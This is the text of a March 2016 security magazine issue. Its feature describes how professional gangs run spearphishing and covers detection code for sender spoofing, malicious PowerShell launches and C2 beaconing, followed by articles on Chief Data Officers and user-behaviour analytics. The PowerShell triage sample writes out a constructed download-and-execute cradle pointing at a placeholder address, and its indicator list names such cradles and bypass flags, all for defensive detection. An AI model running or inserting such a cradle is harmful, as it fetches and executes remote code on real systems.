Then nation-states got in the game, realising that a handful of thoughtfully crafted emails could help them bypass the toughest defences, simply by targeting the right employees. Today, the vast majority of advanced persistent threats (APTs) gain their first foothold inside victim companies by sending a few emails.

Today’s professional Internet criminals work five to nine days, pay taxes, get weekends and holidays off. The companies they work for often have dozens to hundreds of employees, pay bribes to local law enforcement and politicians, and are often seen as the employer of choice in their region. Being employed by companies that break into companies in other countries is often proudly worn as a patriotic badge.

These professional hacking mills employ divisions of labour. The marketing team, often led by executives, seeks customers willing to pay to hack a particular company for information, although the mills will often attack any company on spec, then market the information afterward.

The research and surveillance teams gather information about the target company's organisational structure, business partners, Internet-accessible servers, software versions and current projects. They obtain much of this information by visiting the target company's public website and by breaking into a few of its less well-protected business partners.

This research is passed along to a team of initial compromisers, which establishes anchors inside the target organisation. This team is the most important team at the mill, and it is broken down into several skilled subgroups, each focused on a particular domain: breaking into servers, launching client-side attacks, performing social engineering attacks, or spearphishing. The spearphishing team works hand in hand with the research team, mixing relevant topics and projects into their cadre of boilerplate email templates.

There are other teams as well. Backdoor teams come in after the initial entry is secured to help ensure easy future entry by inserting backdoor Trojans, creating new user accounts, and vacuuming up every log-on credential in the compromised organisation.

Then, like any good consulting company, a longer-term team is dedicated to this "client". This team roots around looking for important information, detailing the organisation's structure and VIPs. Within a short amount of time they know every defence system the company has in place and how to bypass it. When some new project or big piece of data comes online, this team is among the first to know about it. Any potentially interesting information is copied for safekeeping and future sale.

If that sounds a little different from a script kiddie whipping together a sloppy email at an Internet café, you'll know why today's phishing attempts are that much more effective. It's basically a day job, won with an interview, with a salary, benefits, and project bonuses. It even comes with a nondisclosure agreement, HR hassles, and departmental politics.

Make no mistake: phishing emails went pro.

The attack is sent by someone you know

Today's spearphishing emails often originate from someone you email with on a daily basis, not a Nigerian prince. They often appear to be from a boss, team leader, or some other authority figure up the management chain, to ensure the victim opens the email and is more likely to do whatever the email says.

The email could be from an outside, sound-alike email account meant to resemble the authoritative person's personal email account. After all, who hasn't received a work-related email from a co-worker who accidentally used his or her personal account? We accept it as a common mistake.

It might arrive from a sound-alike account name on a popular public email service (Hotmail, Gmail, and so on), with the sender claiming to be using this previously unknown account because they are locked out of their work email. Again, who hasn't been through this before?

But more likely than not, the fake phishing email appears to arrive from the other person's real work email address, either because the phishing organisation can forge the sender address from outside (which works wherever the receiving domain does not check SPF, DKIM and DMARC on mail claiming to be its own) or because it has compromised the other person's email account. The latter is becoming the most popular attack method: who wouldn't click on a link sent by their boss?

The attack includes a project you are working on

Many spearphishing victims fall prey because the malicious sender seems to know what projects they are working on. This is because spearphishers have spent time researching them or have been in control of a colleague's email account for a while. The email may include a subject line like "Here is that report on XYZ you've been waiting on," or "Here are my edits to the report you sent," with an attached copy of a report originally sent by the recipient, but with a malicious auto-launching link added. It might also allude to a project's viability, asking, "Do you think this will impact our project?" or exclaiming "Someone beat us to it!" with a link to a malicious news article that appears related to the project.

There have been emails purporting to be from lawyers seeking increases in child support, sent to individuals going through a divorce. Some people have also received phishing emails from leaders of professional organisations, sent out to their membership lists. There have also been cases of emails to C-level officers claiming to have pending lawsuit information, which ask the recipient to run an executable to 'unlock' the attached confidential PDF file. There were even bogus updates sent to IT security pros purporting to contain a security update from a vendor, about a product they had recently bought and installed.
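The sender tricks described in this section (a look-alike domain, a colleague's name on a free-mail account, replies quietly routed elsewhere, and an internal address forged from outside) are the part of spearphishing a mail gateway can test for mechanically. The following is an added example, not code from the original article: it assumes a hypothetical internal domain example-corp.com, a small constructed employee directory, and that our own receiving gateway stamps an Authentication-Results header on every message it accepts. The sample messages are constructed.

```python
"""Flag spear-phishing sender tricks in an incoming message.

Added example, not code from the original article. Assumes a hypothetical
internal domain (example-corp.com) and that our own receiving gateway stamps
an Authentication-Results header on every message it accepts. Sample messages
and the employee directory are constructed.
"""
import email
from email.utils import parseaddr

COMPANY_DOMAIN = "example-corp.com"
EMPLOYEES = {"dana reyes", "sam ortiz"}          # constructed directory (lower case)
FREEMAIL = {"gmail.com", "hotmail.com", "outlook.com", "yahoo.com"}


def edit_distance(a, b):
    """Plain Levenshtein distance; one or two edits from our domain is a look-alike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr):
    return addr.rpartition("@")[2].lower()


def sender_findings(raw_message):
    """Return the reasons this message's sender should not be trusted at face value."""
    msg = email.message_from_string(raw_message)
    findings = []
    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = domain_of(from_addr)
    _, reply_to = parseaddr(msg.get("Reply-To", ""))

    # Look-alike domain: examp1e-corp.com, example-c0rp.com and friends.
    if from_domain != COMPANY_DOMAIN and 0 < edit_distance(from_domain, COMPANY_DOMAIN) <= 2:
        findings.append(f"look-alike domain {from_domain!r} imitates {COMPANY_DOMAIN!r}")
    # A known colleague's name on a free-mail account ("locked out of my work email").
    if from_domain in FREEMAIL and any(n in display_name.lower() for n in EMPLOYEES):
        findings.append(f"display name {display_name!r} on free-mail domain {from_domain}")
    # Replies quietly routed to a mailbox the attacker controls.
    if reply_to and domain_of(reply_to) != from_domain:
        findings.append(f"Reply-To goes to {domain_of(reply_to)}, not {from_domain}")
    # A message claiming our own domain that neither SPF nor DKIM vouched for at
    # our gateway: the From address was forged from outside.
    auth = msg.get("Authentication-Results", "").lower()
    if from_domain == COMPANY_DOMAIN and "spf=pass" not in auth and "dkim=pass" not in auth:
        findings.append("claims internal domain but neither SPF nor DKIM passed")
    return findings


# Constructed sample messages.
LOOKALIKE = """From: "Dana Reyes, CEO" <dana.reyes@examp1e-corp.com>
Reply-To: dana.reyes.ceo@gmail.com
To: finance@example-corp.com
Subject: Here are my edits to the report you sent
Authentication-Results: mx.example-corp.com; spf=pass smtp.mailfrom=examp1e-corp.com

Please review the attached before the board call.
"""

FREEMAIL_SENDER = """From: "Dana Reyes" <dana.reyes.ceo@gmail.com>
To: finance@example-corp.com
Subject: Locked out of my work account, urgent

Can you send me the Q1 numbers to this address?
"""

FORGED_INTERNAL = """From: "Help Desk" <helpdesk@example-corp.com>
To: all-staff@example-corp.com
Subject: Mandatory password change
Authentication-Results: mx.example-corp.com; spf=fail smtp.mailfrom=example-corp.com; dkim=none

Change your password at the link below within 24 hours.
"""

LEGITIMATE = """From: "Dana Reyes" <dana.reyes@example-corp.com>
To: finance@example-corp.com
Subject: Board deck
Authentication-Results: mx.example-corp.com; spf=pass smtp.mailfrom=example-corp.com; dkim=pass header.d=example-corp.com

Attached.
"""

if __name__ == "__main__":
    for label, raw in (("look-alike", LOOKALIKE), ("free-mail", FREEMAIL_SENDER),
                       ("forged", FORGED_INTERNAL), ("legit", LEGITIMATE)):
        print(label, sender_findings(raw) or ["no sender findings"])
```

These checks catch the forged and look-alike cases only. The case the article calls the most popular, mail sent from a colleague's genuinely compromised mailbox, passes every one of them, which is why the out-of-band confirmation recommended later in the piece is the control that still works.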

The email subjects and body contents aren't generic "Look at this!" ruses. Today's spearphishing email comes from someone you trust, about a project you are working on. After you read a few of these you start wishing all we had to worry about was fake dying relatives and Viagra ads.

Your attacker has been monitoring your company's email

These days corporate attackers are monitoring dozens of email accounts in your company. It's where they get the necessary context to fool your co-workers and where they can monitor the most sensitive and valuable information in your company.

If you find out your company is compromised, assume that all C-level employees and VIP email accounts are compromised and have been for a long time. Even the initial reporting of the bad guy’s possible detection is probably in front of their eyes. They know what you know.

When faced with this sort of adversary, the only solution is a completely "out of band" channel: brand-new computers and new email accounts on a network the intruder has never touched. Anything else will probably be a waste of time.

Your attacker can intercept and change emails as needed

Today's adversary isn't merely a passive reader. They intercept and change emails, albeit slightly, when the need arises. Yes decisions may become no; no may become yes. Sometimes key recipients will be removed from the email's recipient list. More recipients may be added. Email groups may be modified. Encryption and signing may be turned off.

In one of the most notorious examples, a company knew it was badly compromised by an APT. In an attempt to reclaim the network, the help desk sent out an email asking every recipient to change their password. Certainly, that would make it harder for the intruders to hang around, except that the intruders had control of the help desk's email account. Right before the email was sent, the intruders changed the embedded link so that it took users to a perfect copy of the company's password-change website, hosted under the intruders' control. Users followed the help desk directions, but in doing so allowed the intruders to capture every new password. The lesson for defenders: an instruction to change passwords should never carry a link; tell users to type the address of the portal they already know, and send the instruction through a channel the intruder does not control.

Your attacker uses custom or built-in tools to subvert antivirus software

For decades, phishing emails used everyday malware tools as attachments. Today, they use custom tools, compiled and encrypted expressly for you, or programs already built into the operating system you are running. The result is the same: your antimalware scanner doesn't pick up the malicious file or commands. And once the bad company is on your network, they are careful to use only those same tools.

Malicious scripts written for the interpreters already present on the victim's machine (PowerShell above all) are fast becoming the tool of choice. PowerShell is even showing up in malware toolkits, which end up producing PowerShell-only malware programs.

Fueling this trend is the fact that it’s much harder for antimalware software, or even forensic investigators, to determine whether a legitimate tool is being used for nefarious purposes. Take Remote Desktop Protocol (RDP) connections, for example. Nearly every admin uses them. When the bad guy does too, it can be difficult to determine when the RDP connection is doing something malicious. Not only that, but it could be difficult to impossible to remove the legitimate tool to thwart the attacker without also removing the tool the good guy needs to clean up the system.
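The point above, that PowerShell and RDP are the admin's tools as much as the attacker's, means the tool itself cannot be the signal; the way it is launched can. The following is an added example, not code from the original article. It assumes process-creation events with full command lines are already being collected (for example Windows event 4688 with command-line auditing on, or Sysmon event 1) and that they can be fed in as (host, user, command line) records; the hosts, users, script paths and the payload URL are constructed (198.51.100.7 is a documentation address). Single indicators are routine admin noise, so only combinations are reported.

```python
"""Triage PowerShell command lines from process-creation events.

Added example, not code from the original article. Assumes process-creation
events with full command lines are already collected (for example Windows
event 4688 or Sysmon event 1); hosts, users and the payload URL below are
constructed (198.51.100.7 is a documentation address).
"""
import base64
import re

# Indicators commonly combined when the built-in interpreter is launched for
# malicious purposes. One alone is routine admin noise; several together are not.
INDICATORS = {
    r"-(?:enc|encodedcommand)\b": "encoded command",
    r"-w(?:indowstyle)?\s+hidden": "hidden window",
    r"-e(?:x|xec|p|xecutionpolicy)\s+bypass": "execution policy bypass",
    r"-nop(?:rofile)?\b": "no profile",
    r"\biex\b|invoke-expression": "invoke-expression",
    r"downloadstring|net\.webclient|invoke-webrequest": "download cradle",
    r"frombase64string": "inline base64",
}


def decode_encoded_command(cmd):
    """Return the UTF-16LE plaintext behind -EncodedCommand/-enc, or '' if none."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_command(cmd):
    """List the indicators present in the command line and in its decoded payload."""
    text = cmd + "\n" + decode_encoded_command(cmd)
    return [label for pattern, label in INDICATORS.items() if re.search(pattern, text, re.I)]


def triage(events, threshold=2):
    """Return (host, user, indicators) for PowerShell launches with >= threshold indicators."""
    suspicious = []
    for host, user, cmd in events:
        if "powershell" not in cmd.lower():
            continue
        hits = score_command(cmd)
        if len(hits) >= threshold:
            suspicious.append((host, user, hits))
    return suspicious


# Constructed sample events (host, user, command line).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("svr-files01", "CORP\\backupsvc",
     "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1"),    # routine job
    ("wks-finance12", "CORP\\jdoe",
     f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"),           # download cradle
    ("wks-finance12", "CORP\\jdoe", "mstsc.exe /v:svr-files01"),            # RDP, not PowerShell
]

if __name__ == "__main__":
    for host, user, hits in triage(SAMPLE_EVENTS):
        print(f"{host} {user}: {', '.join(hits)}")
```

Decoding the -EncodedCommand payload before matching is the step that matters: the cradle in the second event is invisible on the raw command line, and the same applies to the RDP session in the third record, which this rule deliberately ignores because there is nothing in its launch to distinguish it from an administrator's.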

Your attacker uses military-grade encryption to tunnel your data home

The days of malware using randomly picked ports to copy data off your network are long gone. So too are the days of using well-known reserved ports (such as IRC port 6667) to send commands to and control malicious creations remotely.

Now almost every malware programme talks over TLS on port 443 and uses industry-standard AES encryption. Most companies have a hard time seeing into port 443 traffic, and most don't even try. Companies are increasingly using firewalls and other network security devices to inspect 443 traffic by terminating the TLS session and re-signing it with their own certificate. But when the data inside the TLS stream is further encrypted with AES under a key only the malware knows, that inspection does forensic investigators no good. What remains visible is the connection metadata (destinations, timing, volumes, certificate details), which is where detection has to move.

Malware writers' use of standard encryption is so good that even the FBI is telling ransomware victims to simply pay up. In fact, if you find a malware program running on any port but 443 and not using AES encryption to cover its tracks, it was probably written by a script kiddie. Alternatively, it's been in your environment for a long time, and you only now discovered it.
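When the payload on port 443 is opaque, as the section above describes, the timing of the connections is still yours to read: an implant polling its command-and-control server on a timer produces intervals far more regular than any person browsing. The following is an added example, not code from the original article. It assumes a flow or connection log reduced to (timestamp, src, dst, dport, bytes) tuples; the records below are constructed (203.0.113.9 and 203.0.113.50 are documentation addresses), with a hypothetical implant beaconing every sixty seconds plus a little jitter next to an ordinary browsing session.

```python
"""Spot C2 beaconing in connection metadata when the payload is opaque.

Added example, not code from the original article. Assumes a flow/connection
log with (timestamp_seconds, src, dst, dport, bytes); the records below are
constructed (203.0.113.0/24 is a documentation range).
"""
from collections import defaultdict
from statistics import mean, pstdev


def beacon_candidates(flows, min_flows=8, max_cv=0.15):
    """Return (src, dst, dport, interval_s, n_flows) for src->dst:port pairs whose
    inter-connection intervals are unusually regular. cv = stdev / mean of the
    intervals: human browsing has a high cv, a timer-driven implant a low one.
    Pairs with fewer than min_flows connections are not judged at all."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport, _nbytes in flows:
        by_pair[(src, dst, dport)].append(ts)
    out = []
    for (src, dst, dport), stamps in by_pair.items():
        if len(stamps) < min_flows:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        m = mean(gaps)
        if m > 0 and pstdev(gaps) / m <= max_cv:
            out.append((src, dst, dport, round(m), len(stamps)))
    return out


# Constructed flows: one implant beaconing every ~60 s with jitter, one user browsing.
BEACON = [(60 * i + jitter, "10.10.2.88", "203.0.113.9", 443, 1200)
          for i, jitter in enumerate([0, 2, -1, 3, 0, -2, 1, 2, 0, -1])]
BROWSING = [(t, "10.10.2.31", "203.0.113.50", 443, n)
            for t, n in [(5, 900), (9, 48000), (11, 700), (140, 12000), (141, 3000),
                         (300, 88000), (301, 500), (302, 650), (900, 40000), (1500, 2000)]]
SAMPLE_FLOWS = BEACON + BROWSING

if __name__ == "__main__":
    for src, dst, dport, interval, n in beacon_candidates(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{dport} every ~{interval}s over {n} connections")
```

Expect this to surface legitimate timer-driven traffic too (update checks, monitoring agents, mail clients polling), so the output is a candidate list for an analyst, and known-good destinations should be excluded before alerting. Implants that randomise their sleep widely defeat the coefficient-of-variation test; for those, constant payload sizes and long-lived destination pairs are the next metadata to look at.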

Your attacker covers their tracks

Until the past few years, most companies never bothered to enable logging, or if they did, they didn't collect the logs centrally or alert on suspicious events. But times have changed, and now IT defenders would be considered negligent if they didn't enable and check logs on a routine basis.

The bad guys have responded by using techniques, such as command-line and scripting commands, that are less likely to be picked up by event logging tools, or they simply delete the logs when they are finished. Some of the more sophisticated attackers use rootkits, which maliciously modify the operating system so that their tools never appear in process listings, directory listings or logs.

Your attacker has been in your environment for years

The average time a professional criminal organisation has been inside a victim's company before being noticed is measured in months to years. I frequently work with companies that have multiple professional gangs in their company, and some have been inside for as long as eight years.

The very respected Verizon Data Breach Investigations Report frequently reports that most internal breaches are noticed by external parties. In most cases that’s because the external party was also compromised for years, and during its forensics investigation it noticed that its data or attackers were coming or going to another company as a staging point.

There have been cases where organisations found the bad guy had been in the company for so long that the malware they placed was part of the company's gold image; that is, every new computer came with the malicious software installed. There have also been instances where Trojans and malware programmes were allowed to spread for years because the IT staff assumed they were a necessary software component placed by some other group within the same organisation. Hackers love these sorts of assumptions.

Your attacker is not afraid of getting caught

It used to be that a phisher would get into your company, steal money or information, and be gone as soon as possible. Getting in and out quickly minimised the chances of being caught, identified, and prosecuted.

Today’s attacker is likely based in a foreign country where your legal jurisdiction and warrants don’t work. You can even identify (using legal evidence) the hacking firm, its hackers, and its physical address to their local authorities, and nothing is likely to happen.

In most of the attacks, the hackers don’t run even once they are found. To be sure, they don’t want to be found, but once they are, they hack even more freely and blatantly, as if the restraints have been pulled off.

Remediation ends up being a cat-and-mouse game where the mouse has all the advantages. At first you don’t know what they’ve compromised and how many ways they can get back in. And it all likely started because someone opened up a spearphishing email.

What you can do

Remediation begins with educating all employees about the new reality of spearphishing attacks. Everyone should know that the old-style phishing emails, full of typos and promises of unearned millions, are no longer your main worry. Explain how the new spearphishing emails are handcrafted by professional criminal gangs that know exactly how to tailor their work to seem like a legitimate email coming from someone your colleagues trust.

Employees should be told to always ask for independent confirmation (such as a phone call or IM, using contact details they already have rather than any given in the message) before clicking and running any executable or opening any unexpected document. A quick confirmation is simply due diligence today. Tell employees to report anything suspicious. If they accidentally executed anything that they later became suspicious about, they should report that as well. It is important to remove the stigma and embarrassment of being fooled. Let them know that anyone, even security experts, can be tricked today, given the sophistication of the attacks.

Many companies aggressively test their employees with fake phishing attempts. These tests should use phishing email templates that are more sophisticated and less like the phishing attempts of the past. Keep testing individual employees until you get a very low percentage of easily compromised employees. If you do it right, your employees will question any unexpected email asking for credentials or to execute programs. Having employees question your legitimate emails is a welcome symptom of a good education programme.

Lastly, if a spearphishing attempt is successful in your company, use the actual phish email and the compromised employee’s testimony (if they are well liked and trusted) to help teach others about today’s spearphishing environment. Anything that brings the new lessons front and centre is welcome.

The key to prevention is getting everyone to see that today’s spearphishing email is not what they were used to in the past.


DO YOU NEED A CHIEF DATA OFFICER?

The C-suite is getting a little more crowded these days. Pull up a chair for the Chief Data Officer, and it might be next to the CISO.

FEATURE

The CDO title has been around for almost six years, as companies realised the business value of their data and that they needed someone to rein it in. Now, as companies move into the post-infrastructure era, where data is moving outside the organisation and into the cloud, one Gartner analyst suggests that the CDO could be responsible for more than just managing data, understanding where it resides and who uses it. He could also focus on "strategies to improve the protection of that data as it lives in infrastructure that you don't control anymore," says Peter Firstbrook, Research Vice President, Gartner.

Today, there are only about 1,000 chief data and chief analytics officers in the world, according to Gartner. By 2019, the research firm predicts that 90 percent of all global enterprises will have appointed a CDO. But exactly what the CDO's responsibilities are, and how companies will manage the overlap of duties in the C-suite, remain to be seen.

For starters, the CDO’s responsibilities over governance, data risk and compliance may overlap with the duties of the CISO, according to industry watchers and current CDOs. A new chief in the C-suite can trigger confusion, uncertainty, resistance and even conflict, says Mario Faria, Research Director, Information and Analytics, Gartner CDO/CAO.

"Each CDO means something very different to every vertical and every company," says Justin Cerilli, Managing Director, Russell Reynolds Associates, which has seen the number of searches for data and analytics officers double every year since 2013.

Most financial services organisations need a CDO to manage data risk and compliance. Consumer packaged goods or healthcare organisations hire CDOs to drive cost efficiency and cost reduction, while most media and marketing companies want CDOs to drive extra revenue. Each responsibility requires different skills, and the ranking of the most desired skills has shifted dramatically in the last few years, Cerilli says.

CDOs and executive search pros offer their views on the CDO role and how it fits into the C-suite.


different executives. In many financial services companies, for instance, the CDO reports to the CFO to ensure the data they’re protecting falls in line with the regulatory requirements, Cerilli says, but sometimes the CISO has owned the IT risk. “This is where we’re seeing a lot of overlap,” he says.

Finding the right CDO skills

Financial institutions may need a CDO with risk and compliance experience, but what if they also want to drive better customer and employee experiences, drive growth or innovate through data and analytics? "That's a very different CDO," Cerilli says, "which makes finding qualified, experienced candidates more challenging."

For starters, the CDO role has evolved over the last few years from a technically driven position to a more visionary role. In a recent survey of CEOs by Russell Reynolds, technical depth dropped to sixth place among the most important skills required for a CDO, behind stakeholder management, storytelling and communication skills, being a visionary, the ability to execute and commercial acumen.

“The CDO is now really a culture-change role about how you enable data and create better data synergy across an organisation,” explains Cerilli. “Technical depth is still very important in order to execute, but what separates the best from the rest are those top five skills.”

According to Cerilli, the shortage of qualified candidates for CDO roles has led to some failures. “It’s tough to find people who have driven this type of change before,” he says. “People are being asked to step up into roles that they’re probably not ready for, and they’re probably being promoted for their technical acumen. However, what’s going to make you successful is less about that and more about how you navigate an organisation and influence them to start using data as a tool. As a result, some technical experts flounder in this role.

“Companies have also hired consultants who are experienced in change management for the CDO role, but most are better able to present a solution than to own and execute it,’” he adds.

A short lifespan?One chief data officer believes that the CDO movement is just industry hype, and that five years from now they will disappear from the C-suite.

“Many companies appoint CDOs because they feel the pressure around them,” says Dimitris Agrafiotis, Chief Data Officer, Covance. “The CDO role will ride the hype curve – and when many of these companies get disappointed by the results because of the people they hire for these roles, the pendulum will swing and their responsibilities will be absorbed by other departments.”

But for now, the CDO search continues for many companies. “With every person you hire for one of these roles, there’s a little bit of risk to the organisation,” Cerilli says, “but it’s a risk you need to take in order to drive culture change.”

fEATuRE

The CISO-CdO partnership“The CDO role is an influencing role across the organisation,” Cerilli says. “You can’t have responsibility for all information across all the company because there are different stakeholders in different business units. The best of the best CDOs and CISOs realise that they need to work together to drive the change that’s necessary.”

Derek Strauss who became TD Ameritrade’s first chief data officer in 2012, says he has developed a collaborative relationship with the CISO on issues of data security and considers himself a mediator between the CISO and business units.

“The business community wants data in their hands as quickly as possible, but the CISO has rightly secured the data. They are [pulling] in opposite directions,” he explains. “We jump in the middle and say ‘what’s really important is determining who can see the data and do what with the data. The CDO helps the organisation determine who the data owners are so they can act in that role.”

Their relationship continues to evolve as the company ramps up its analytics environment. Their biggest challenge continues to be “marrying up the need to secure the data and the need to give access to it,” Strauss says. Both Strauss and the CISO report to the COO.

Kay Vicino, Senior Vice President and Chief Data Office, US Bancorp, says “We have a CISO who is more focused on perimeter data security. My focus is more data governance in-house, as well as supporting our analytics initiatives. I report to the CIO. Previously so did the CISO, but he now reports to the vice chairmain of technology and operations.”

Gartner’s Faria says there are no right or wrong models. He has seen organisations where the CSO reports to the CDO, where the CSO reports to the CIO or to a COO, and where the CISO and CDO don’t report to the same leader at all. “It’s just very important to identify clear responsibilities,” he adds.

In some cases, the CISO and CDO may share responsibilities but report to

The CdO role is an influencing role across the organisation. ou can’t have responsibility for all information across all the company because there are different stakeholders in different business units.

03.2016 33www.securityadvisorme.com

Page 34: Security Advisor Middle East | Issue 3

A

OPINION

kEEPINg AN EyE ON uSER bEhAvIOuRBreach discovery can take days using traditional methods, Leslie Lambert, Chief Security and Strategy Officer, Gurucul, shares some steps to follow in implementing a behaviour centric detection response.

ccording to the Verizon 2015 Data Breach Investigations

Report (DBIR), 60 percent of the time, attackers were able to compromise an organisation within minutes. Meanwhile, in more than 75 percent of the cases, the average time to discover breaches was measured in days. These findings indicate a growing “detection deficit” between attackers and defenders. Verizon sees this as one of the primary challenges to the security industry today and going forward.

For incident responders, time spent in the same position, area, or stage of a process, such as the delta between when a compromise occurs and when it is discovered, is called dwell time. Reducing dwell time is critical to enabling successful prevention or resolution of a cyber incident.

The primary reason for the long delays in breach discovery reported by Verizon is that we are still very much focused on defending against intrusions. A new and more effective approach to quickly decode cyber incidents is needed,

Leslie Lambert, Chief Security and Strategy Officer, Gurucul

34 03.2016 www.securityadvisorme.com

Page 35: Security Advisor Middle East | Issue 3

collected and determine what “good behaviour” looks like. This will make it easier to isolate user behaviours that are suspicious, should be monitored or investigated. Examples of suspicious behaviour may include inappropriate use of elevated access privileges, or more latent threats, such as data breaches.

This should be followed by continuous monitoring of behavioural data in order to assess user access and usage within “trackable” peer groups. The use of peer groups places behaviours in context and helps to expose ‘outliers’ based on the roles each user performs in comparison to other members of their department, project or work groups, etc.

An important subsequent step is to identify and track all authorised access credentials that are in use, including orphaned, shared, third-party and remote access accounts. Most can be used to access sensitive company data, systems and applications, and as a springboard for data breaches. Once a user’s access credentials are hijacked, they can enable attackers to move around the network undetected.

Also, access credentials should be monitored across all networks, voice and data channels, infrastructure, computer systems, devices, databases and applications. As part of this process, any excess access credentials that are not required by users should be revoked. Especially those that do not

OPINION

one that enables us to understand the complex activities occurring on our networks, and what “good” cyber activity looks like. To accomplish this, we need to start at the source of all network activity -- the behaviours of users and entities or devices.

Why focus on behaviours? It’s well documented that users are the weakest link in the security chain and pose the highest risk to our computing environments. Yet, knowledge of user behaviours is where we typically have the least amount of visibility, especially into what users are accessing and their patterns of usage. Active engagement in monitoring, detecting and deriving insight into user access and usage patterns can foretell risky activity. Identifying early warning signs is critical for protecting against sophisticated threats including malicious insiders and external attackers that have hijacked legitimate user accounts.

Let’s examine the steps for implementing activity- and usage-centric incident response.

As a starting point, review all security-related data that is being collected by any form of logging. To make sense of this data establish a baseline of which user access and usage activities are being logged and which are not. This will expose any glaring blindspots in collection schemes.

Next, apply analytic techniques to understand the data that’s been

Identifying early warning signs is critical for protecting against sophisticated threats including malicious insiders and external attackers that have hijacked legitimate user accounts.

match up or conflict with other users in an individual’s relevant peer groups.

In addition, pay close attention to user accounts with elevated access privileges, such as systems or database administrator accounts and system-level accounts on all security and perimeter devices and so on. Some of these accounts may not be used on a regular basis, and should, therefore, be scanned continuously to evaluate whether they need to be removed or disabled.

Once user credentials are being monitored and logged, access activity should be analysed against sensitive or privileged data. For example, which user accounts are accessing customer, supplier or finance data? Why is this type of data being accessed by these user accounts? Are users access privileges consistent with their need to access this type of data?

Being able to differentiate between “good” and “bad” user behaviour is the foundation for gathering actionable incident detection and response intelligence. It is also vital for shortening the dwell time of intrusions and containing or preventing data exfiltration.
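The review steps above, worked on constructed data as an added example (not code from the column or from Gurucul): the account inventory, the log records, the data classes treated as sensitive and the 90-day idle threshold are all assumptions.

```python
"""Added example (not from the column or Gurucul): the review steps run over
constructed records: per-user access profiles, peer-group comparison, flags
for sensitive data no peer touches, and orphaned or idle privileged accounts."""
from collections import defaultdict
from datetime import date
# Constructed inventory: dept, owner (None = orphaned), privileged, last use.
ACCOUNTS = {
    "alice": ("finance", "Alice", False, date(2016, 3, 1)),
    "bob": ("finance", "Bob", False, date(2016, 3, 2)),
    "dave": ("sales", "Dave", False, date(2016, 3, 1)),
    "erin": ("sales", "Erin", False, date(2016, 3, 2)),
    "frank": ("sales", "Frank", False, date(2016, 3, 2)),
    "dba_old": ("it", None, True, date(2015, 9, 10)),
    "root_legacy": ("it", "IT", True, date(2015, 11, 1)),
}
# Constructed access log, one "<user> <resource> <data class>" record per line.
ACCESS_LOG = """\
alice ledger finance
bob ledger finance
dave crm customer
dave pricelist supplier
erin crm customer
erin ledger finance
frank crm customer
frank pricelist supplier
"""
SENSITIVE = frozenset({"finance", "customer", "supplier"})
REVIEW_DATE = date(2016, 3, 3)  # constructed "today" for the idle check

def build_profiles(log_text):
    """Map each user to the set of (resource, data_class) pairs they accessed."""
    profiles = defaultdict(set)
    for line in log_text.splitlines():
        if line.strip():
            user, resource, data_class = line.split()
            profiles[user].add((resource, data_class))
    return profiles

def peer_group_outliers(profiles, accounts):
    """{user: [resource, ...]} of sensitive resources a user accessed that no
    peer in the same department accessed: access that warrants investigation."""
    flagged = {}
    for user, touched in profiles.items():
        dept = accounts[user][0]
        peers = [u for u in profiles if u != user and accounts[u][0] == dept]
        peer_access = set().union(*(profiles[u] for u in peers))
        excess = sorted(r for r, c in touched - peer_access if c in SENSITIVE)
        if excess:
            flagged[user] = excess
    return flagged

def accounts_to_review(accounts, today=REVIEW_DATE, max_idle_days=90):
    """Orphaned accounts plus privileged accounts idle beyond max_idle_days."""
    review = {}
    for name, (_, owner, privileged, last_used) in accounts.items():
        idle = (today - last_used).days
        if owner is None:
            review[name] = "orphaned"
        elif privileged and idle > max_idle_days:
            review[name] = f"privileged, idle {idle} days"
    return review
```

On this data the sales user erin is the only peer-group outlier (reading the finance ledger), while the orphaned DBA account and the long-idle privileged account surface for revocation.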

About the author

Leslie K. Lambert, CISSP, CISM, CISA, CRISC, CIPP/US/G, is the Chief Security and Strategy Officer for Gurucul, an identity-based threat detection and deterrence company. She is the former CISO for Juniper Networks and Sun Microsystems, and has over 30 years of experience in information security, IT risk and compliance, security policies, standards and procedures, incident management, intrusion detection, security awareness, and threat and vulnerability assessments and mitigation.


BLOG

Will Industry 4.0 be safe?

By Ajay Bhalla, President, Enterprise Security Solutions at MasterCard

The convergence of the digital and physical worlds is more than a MasterCard rallying cry. It is in fact a fundamental shift that’s driving the Fourth Industrial Revolution, or Industry 4.0, where automation, data exchange and manufacturing technologies are going to simplify our lives, drive better experiences and give us more time to focus on the things that matter most – our families, friends and experiences.

But to get to this state of safe automation and connectivity, we need to talk about the role of security and innovation. Both are of paramount importance.

When the World Wide Web was first invented, it was not designed with security in mind. The subsequent global expansion has not only brought about enormous change to people and business but has also introduced us to new forms of threats. The Internet of Things (IoT) will offer more opportunity for commerce and positively impact financial inclusion across the world. However, with every new connected device, security needs to be included from the concept stage as a priority. It is more important than ever that we address cybersecurity challenges while fighting hacks, breaches, stolen identities and more – all in an effort to stay ahead of the bad guys. Innovation cannot be done with security as an afterthought. Instead, security and innovation need to be developed hand-in-hand and planned for from idea inception to product rollout, and beyond.

Recently, I was part of a panel discussion at the World Economic Forum in Davos, Switzerland. The panel “Securing the next evolution of the connected world,” featured Sir Tim Berners-Lee, inventor of the World Wide Web and Salesforce.

With this philosophy in mind, it was indeed a timely and exciting panel so I wanted to share some key highlights:

